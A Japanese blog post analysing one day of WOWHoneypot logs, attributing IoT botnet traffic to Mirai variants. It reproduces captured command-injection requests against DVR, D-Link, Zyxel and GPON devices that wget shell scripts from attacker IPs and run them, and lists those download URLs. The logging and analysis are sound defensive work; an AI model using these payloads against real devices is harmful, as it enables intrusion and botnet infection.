S-Owl

S(ecurity)Owl

トップ > honeypot > WOWHoneypotの簡易分析(52日目)

WOWHoneypotの簡易分析(52日目)

honeypot

WOWhoneypotの2018/07/25(水) (運用52日目)の簡易分析です。
本日の総アクセス件数は 105件です。以下が全アクセスログです。

43 2018-07-25 GET /
6 2018-07-25 GET /shell?cd+/tmp;cd+/var;wget+hxxp://199.195.254.118/jaws+-O+lwodo;sh%+lwodo;rm+-rf+lwodo
5 2018-07-25 POST /GponForm/diag_Form?images/
3 2018-07-25 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://199.195.254.118/dlink%20-O%20-%3E%20/tmp/xd;sh%20/tmp/xd%27$
2 2018-07-25 POST /qq.php
1 2018-07-25 PROPFIND /
1 2018-07-25 POST /zuoshou.php
1 2018-07-25 POST /yao.php
1 2018-07-25 POST /xx.php
1 2018-07-25 POST /xw.php
1 2018-07-25 POST /xw1.php
1 2018-07-25 POST /xshell.php
1 2018-07-25 POST /xiao.php
1 2018-07-25 POST /xiaoma.php
1 2018-07-25 POST /wuwu11.php
1 2018-07-25 POST /wshell.php
1 2018-07-25 POST /w.php
1 2018-07-25 POST /weixiao.php
1 2018-07-25 POST /webslee.php
1 2018-07-25 POST /wc.php
1 2018-07-25 POST /system.php
1 2018-07-25 POST /s.php
1 2018-07-25 POST /sheep.php
1 2018-07-25 POST /q.php
1 2018-07-25 POST /phpstudy.php
1 2018-07-25 POST /pe.php
1 2018-07-25 POST /mx.php
1 2018-07-25 POST /log.php
1 2018-07-25 POST /lindex.php
1 2018-07-25 POST /hm.php
1 2018-07-25 POST /feixiang.php
1 2018-07-25 POST /fack.php
1 2018-07-25 POST /defect.php
1 2018-07-25 POST /db_session.init.php
1 2018-07-25 POST /db.init.php
1 2018-07-25 POST /db__.init.php
1 2018-07-25 POST /data.php
1 2018-07-25 POST /conflg.php
1 2018-07-25 POST /cmd.php
1 2018-07-25 POST /cainiao.php
1 2018-07-25 POST /aotu.php
1 2018-07-25 POST /angge.php
1 2018-07-25 POST /ak47.php
1 2018-07-25 POST /9678.php
1 2018-07-25 HEAD /
1 2018-07-25 GET /?XDEBUG_SESSION_START=phpstorm
1 2018-07-25 GET /webdav/
1 2018-07-25 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.172.164.41/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$
1 2018-07-25 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://104.244.72.82/k%20-O%20-%3E%20/tmp/k;sh%20/tmp/k%27$
1 2018-07-25 GET /cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&ping_ip=google.ca%20%3B%20cd%20/tmp%3Bwget%20hxxp://178.128.11.199/rvs%20-O%20/tmp/rz%3Bchmod%20777%20/tmp/rz%3Bsh%20/tmp/rz%20
1 2018-07-25 GET /admin/assets/js/views/login.js

phpMyAdmin関連(1件)とphpに対するPOST(40件)と/を除外したアクセス数です。

6 2018-07-25 GET /shell?cd+/tmp;cd+/var;wget+hxxp://199.195.254[.]118/jaws+-O+lwodo;sh%+lwodo;rm+-rf+lwodo
5 2018-07-25 POST /GponForm/diag_Form?images/
3 2018-07-25 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://199.195.254[.]118/dlink%20-O%20-%3E%20/tmp/xd;sh%20/tmp/xd%27$
1 2018-07-25 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.172.164[.]41/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$
1 2018-07-25 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://104.244.72[.]82/k%20-O%20-%3E%20/tmp/k;sh%20/tmp/k%27$
1 2018-07-25 GET /cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&ping_ip=google.ca%20%3B%20cd%20/tmp%3Bwget%20hxxp://178.128.11[.]199/rvs%20-O%20/tmp/rz%3Bchmod%20777%20/tmp/rz%3Bsh%20/tmp/rz%20
1 2018-07-25 GET /?XDEBUG_SESSION_START=phpstorm
1 2018-07-25 GET /webdav/
1 2018-07-25 GET /admin/assets/js/views/login.js

Gemini/2.0関連が多く出ています。

6 2018-07-25 GET /shell?cd+/tmp;cd+/var;wget+hxxp://199.195.254[.]118/jaws+-O+lwodo;sh%+lwodo;rm+-rf+lwodo
5 2018-07-25 POST /GponForm/diag_Form?images/
3 2018-07-25 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://199.195.254[.]118/dlink%20-O%20-%3E%20/tmp/xd;sh%20/tmp/xd%27$
1 2018-07-25 GET /cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&ping_ip=google.ca%20%3B%20cd%20/tmp%3Bwget%20hxxp://178.128.11[.]199/rvs%20-O%20/tmp/rz%3Bchmod%20777%20/tmp/rz%3Bsh%20/tmp/rz%20

新たにでたshellは以下の脆弱性を攻撃しているものと思われます。
MVPower DVR TV-7104HE 1.8.4 115215B9 - Shell Command Execution (Metasploit)
それ以外はGPON,D-LINK,ZyxelというIoT機器を狙ったものと思われます。
攻撃者はご丁寧にwgetで取得する先をjaws,dlink,rvsとそれぞれ機器に関連する名前でシェルスクリプトを配置しています。
https://urlscan.io/result/62c3ee3d-20c9-43dc-a536-0008b84cee05
日毎に新しい手法を追加しながら、徐々にbotの規模を大きくしているようです。

その他、以下はHakai/2.0です。

1 2018-07-25 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.172.164[.]41/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$

以下はUA: Hello, World でMirai亜種Shinoa/Satoriです。

1 2018-07-25 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://104.244.72[.]82/k%20-O%20-%3E%20/tmp/k;sh%20/tmp/k%27$ 

 その他は以下です。
XDebugというPHPをリモートでデバッグするツールへの調査行為
WebDAVの利用調査
FreePBXの存在を狙ったスキャン

 

本日のハンティングログは以下です。どれもIoT機器関連です。

6 2018-07-25 wget+hxxp://199.195.254[.]118/jaws
3 2018-07-25 wget hxxp://199.195.254[.]118/dlink
1 2018-07-25 wget hxxp://185.172.164[.]41/e
1 2018-07-25 wget hxxp://178.128.11[.]199/rvs
1 2018-07-25 wget hxxp://104.244.72[.]82/k 

 

以上です。